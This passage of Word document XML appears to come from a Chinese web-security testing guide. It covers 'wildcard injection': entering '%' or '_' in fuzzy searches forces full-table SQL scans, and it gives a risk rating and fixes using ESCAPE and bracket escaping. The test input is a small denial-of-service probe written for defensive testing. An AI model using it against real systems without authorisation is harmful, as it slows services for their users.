      <w:bookmarkStart w:id="48" w:name="_Toc498434510"/>
      <w:r w:rsidRPr="00A82BA3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通配符注入</w:t>
      </w:r>
      <w:bookmarkEnd w:id="48"/>
    </w:p>
    <w:p w14:paraId="5CE42333" w14:textId="668F76A9"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漏洞描述：</w:t>
      </w:r>
      <w:r w:rsidR="00DC5195" w:rsidRPr="00015E58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>允许使用通配符构造语句查询数据库，导致拒绝服务攻击问题。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7511249B" w14:textId="1ADD09C3" w:rsidR="006E0717" w:rsidRPr="00015E58" w:rsidRDefault="008C28BD" w:rsidP="00015E58">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00015E58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>测试方法：</w:t>
      </w:r>
      <w:r w:rsidR="000A1A66" w:rsidRPr="00015E58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>模糊查询时输入</w:t>
      </w:r>
      <w:r w:rsidR="006E0717" w:rsidRPr="00015E58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第一个字符</w:t>
      </w:r>
      <w:r w:rsidR="006E0717" w:rsidRPr="00015E58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>'%'</w:t>
      </w:r>
      <w:r w:rsidR="006E0717" w:rsidRPr="00015E58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r w:rsidR="006E0717" w:rsidRPr="00015E58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>'_'</w:t>
      </w:r>
      <w:r w:rsidR="000A1A66" w:rsidRPr="00015E58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="006E0717" w:rsidRPr="00015E58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sql</w:t>
      </w:r>
      <w:r w:rsidR="006E0717" w:rsidRPr="00015E58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>会遍历全表</w:t>
      </w:r>
      <w:r w:rsidR="000A1A66" w:rsidRPr="00015E58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，导致应用访问缓慢</w:t>
      </w:r>
      <w:r w:rsidR="006E0717" w:rsidRPr="00015E58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73CCC8FB" w14:textId="77777777" w:rsidR="00B71DE4" w:rsidRPr="00015E58" w:rsidRDefault="00C24790" w:rsidP="00015E58">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00015E58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>风险分析</w:t>
      </w:r>
      <w:r w:rsidR="008C28BD" w:rsidRPr="00015E58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="00B71DE4" w:rsidRPr="00015E58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidR="00B71DE4" w:rsidRPr="00015E58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中通配符的使用如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12473162"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w:t>
      </w:r>
      <w:r w:rsidRPr="00015E58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>包含零个或多个字符的任意字符串。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="503E3B2B"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_</w:t>
      </w:r>
      <w:r w:rsidRPr="00015E58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>任何单个字符。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E70ADCB"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w:t>
      </w:r>
      <w:r w:rsidRPr="00015E58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>指定范围（例如</w:t>
      </w:r>
      <w:r w:rsidRPr="00015E58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> [a-f]</w:t>
      </w:r>
      <w:r w:rsidRPr="00015E58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）或集合（例如</w:t>
      </w:r>
      <w:r w:rsidRPr="00015E58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> [abcdef]</w:t>
      </w:r>
      <w:r w:rsidRPr="00015E58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）内的任何单个字符。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43C84865"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w:t>
      </w:r>
      <w:r w:rsidRPr="00015E58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不在指定范围（例如</w:t>
      </w:r>
      <w:r w:rsidRPr="00015E58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> [^a - f]</w:t>
      </w:r>
      <w:r w:rsidRPr="00015E58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）或集合（例如</w:t>
      </w:r>
      <w:r w:rsidRPr="00015E58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> [^abcdef]</w:t>
      </w:r>
      <w:r w:rsidRPr="00015E58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）内的任何单个字符。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A7F3823" w14:textId="74E12850" w:rsidR="008C28BD" w:rsidRPr="00015E58" w:rsidRDefault="00B71DE4" w:rsidP="00015E58">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00015E58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在模糊查询</w:t>
      </w:r>
      <w:r w:rsidRPr="00015E58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>LIKE</w:t>
      </w:r>
      <w:r w:rsidRPr="00015E58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中，对于输入数据中的通配符必须转义，否则会造成客户想查询包含这些特殊字符的数据时，这些特殊字符却被解析为通配符</w:t>
      </w:r>
      <w:r w:rsidR="00AD2150" w:rsidRPr="00015E58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="0069667C" w:rsidRPr="00015E58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据库响应</w:t>
      </w:r>
      <w:r w:rsidR="00AD2150" w:rsidRPr="00015E58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>缓慢，导致拒绝服务攻击。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D994D43" w14:textId="77777777"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风险等级：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D35E62C" w14:textId="543F317C" w:rsidR="008C28BD" w:rsidRPr="00015E58" w:rsidRDefault="00460E57" w:rsidP="00015E58">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00015E58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FFC000"/>
        </w:rPr>
        <w:t>【</w:t>
      </w:r>
      <w:r w:rsidRPr="00015E58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FFC000"/>
        </w:rPr>
        <w:t>中危</w:t>
      </w:r>
      <w:r w:rsidRPr="00015E58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FFC000"/>
        </w:rPr>
        <w:t>】</w:t>
      </w:r>
      <w:r w:rsidRPr="00015E58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="0069667C" w:rsidRPr="00015E58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通配符注入引发数据库响应缓慢</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B45FA84" w14:textId="77777777" w:rsidR="00915A32" w:rsidRPr="00015E58" w:rsidRDefault="008C28BD" w:rsidP="00015E58">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00015E58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>修复方案：</w:t>
      </w:r>
      <w:r w:rsidR="00915A32" w:rsidRPr="00015E58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有两种将通配符转义为普通字符的方法：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66A859CA" w14:textId="77777777" w:rsidR="00915A32" w:rsidRPr="00015E58" w:rsidRDefault="00915A32" w:rsidP="00015E58">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F97CE34" w14:textId="6D3BD17A"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 xml:space="preserve">1)   </w:t>
      </w:r>
      <w:r w:rsidRPr="00015E58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00015E58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ESCAPE</w:t>
      </w:r>
      <w:r w:rsidRPr="00015E58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>关键字定义转义符（通用）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="214D9764" w14:textId="2AE01707"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在模式中，当转义符置于通配符之前时，该通配符就解释为普通字符。例如，要搜索在任意位置包含字符串</w:t>
      </w:r>
      <w:r w:rsidRPr="00015E58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 5% </w:t>
      </w:r>
      <w:r w:rsidRPr="00015E58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的字符串，请使用：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27B1D17A" w14:textId="426A2796" w:rsidR="00915A32" w:rsidRPr="00015E58" w:rsidRDefault="00915A32" w:rsidP="00015E58">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00015E58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">        WHERE </w:t>
      </w:r>
      <w:r w:rsidR="00CC170C" w:rsidRPr="00015E58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>ColumnA LIKE '%5/%%' ESCAPE '/'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7056633E" w14:textId="5BBB8237"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 xml:space="preserve">2)   </w:t>
      </w:r>
      <w:r w:rsidRPr="00015E58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在方括号</w:t>
      </w:r>
      <w:r w:rsidRPr="00015E58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> ([ ]) </w:t>
      </w:r>
      <w:r w:rsidRPr="00015E58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中只包含通配符本身，或要搜索破折号</w:t>
      </w:r>
      <w:r w:rsidRPr="00015E58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> (-) </w:t>
      </w:r>
      <w:r w:rsidRPr="00015E58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>而不是用它指定搜索范围，</w:t>
      </w:r>
      <w:r w:rsidRPr="00015E58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>请将破折号指定为方括号内的第一个字符。</w:t>
      </w:r>
      <w:r w:rsidR="00CC170C" w:rsidRPr="00015E58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>例如</w:t>
      </w:r>
      <w:r w:rsidRPr="00015E58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af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7"/>
        <w:gridCol w:w="4237"/>
      </w:tblGrid>
      <w:tr w:rsidR="00CC170C" w:rsidRPr="00015E58" w14:paraId="5DF357D6" w14:textId="77777777" w:rsidTr="000340B6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4237" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="198738DA" w14:textId="3CD205EC" w:rsidR="00CC170C" w:rsidRPr="00015E58" w:rsidRDefault="00CC170C" w:rsidP="00015E58">
            <w:pPr>
              <w:spacing w:line="300" w:lineRule="auto"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00015E58">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>符号</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4237" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="739CB5B2" w14:textId="48ECBB16" w:rsidR="00CC170C" w:rsidRPr="00015E58" w:rsidRDefault="00CC170C" w:rsidP="00015E58">
            <w:pPr>
              <w:spacing w:line="300" w:lineRule="auto"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00015E58">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>含义</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CC170C" w:rsidRPr="00015E58" w14:paraId="74601F36" w14:textId="77777777" w:rsidTr="000340B6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4237" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5B7D956A" w14:textId="640E1564"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5[%]'</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4237" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7BD9FA31" w14:textId="0B578BC7" w:rsidR="00CC170C" w:rsidRPr="00015E58" w:rsidRDefault="00CC170C" w:rsidP="00015E58">
            <w:pPr>
              <w:spacing w:line="300" w:lineRule="auto"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00015E58">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
              </w:rPr>
              <w:t>5%</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CC170C" w:rsidRPr="00015E58" w14:paraId="7B0E022E" w14:textId="77777777" w:rsidTr="000340B6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4237" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="269A4CBC" w14:textId="4F24BB46"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5%'</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4237" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="087E945A" w14:textId="4F314A77" w:rsidR="00CC170C" w:rsidRPr="00015E58" w:rsidRDefault="00CC170C" w:rsidP="00015E58">
            <w:pPr>
              <w:spacing w:line="300" w:lineRule="auto"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00015E58">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">5 </w:t>
            </w:r>
            <w:r w:rsidRPr="00015E58">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>后跟</w:t>
            </w:r>
            <w:r w:rsidRPr="00015E58">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> 0 </w:t>
            </w:r>
            <w:r w:rsidRPr="00015E58">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>个或多个字符的字符串</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CC170C" w:rsidRPr="00015E58" w14:paraId="5D3AD63F" w14:textId="77777777" w:rsidTr="000340B6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4237" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="63769578" w14:textId="5C158EA9"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_]n'</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4237" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5751190C" w14:textId="420EDC43" w:rsidR="00CC170C" w:rsidRPr="00015E58" w:rsidRDefault="00CC170C" w:rsidP="00015E58">
            <w:pPr>
              <w:spacing w:line="300" w:lineRule="auto"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00015E58">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
              </w:rPr>
              <w:t>_n</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CC170C" w:rsidRPr="00015E58" w14:paraId="73A86C25" w14:textId="77777777" w:rsidTr="000340B6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4237" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3D23FEB3" w14:textId="4D8ECD64"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 [ ]'</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4237" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="28EEFE8F" w14:textId="7A6A5396" w:rsidR="00CC170C" w:rsidRPr="00015E58" w:rsidRDefault="00CC170C" w:rsidP="00015E58">
            <w:pPr>
              <w:spacing w:line="300" w:lineRule="auto"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00015E58">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CC170C" w:rsidRPr="00015E58" w14:paraId="53E60560" w14:textId="77777777" w:rsidTr="000340B6">
        <w:trPr>
          <w:trHeight w:val="589"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4237" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1F49AA20" w14:textId="57226F3A"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4237" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="681049A4" w14:textId="5F11EBC5" w:rsidR="00CC170C" w:rsidRPr="00015E58" w:rsidRDefault="00CC170C" w:rsidP="00015E58">
            <w:pPr>
              <w:spacing w:line="300" w:lineRule="auto"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00015E58">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">]   </w:t>
            </w:r>
            <w:r w:rsidRPr="00015E58">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>（右括号不需要转义）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="393E32C3" w14:textId="77777777" w:rsidR="004E1131" w:rsidRDefault="004E1131" w:rsidP="00015E58">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F5FF2AC" w14:textId="06A5C738"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所以，</w:t>
      </w:r>
      <w:r w:rsidR="001D289D" w:rsidRPr="00015E58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对</w:t>
      </w:r>
      <w:r w:rsidRPr="00015E58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>输入参数的关键字过滤后，还需要做下面转换确保</w:t>
      </w:r>
      <w:r w:rsidRPr="00015E58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>LIKE</w:t>
      </w:r>
      <w:r w:rsidRPr="00015E58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的正确执行</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
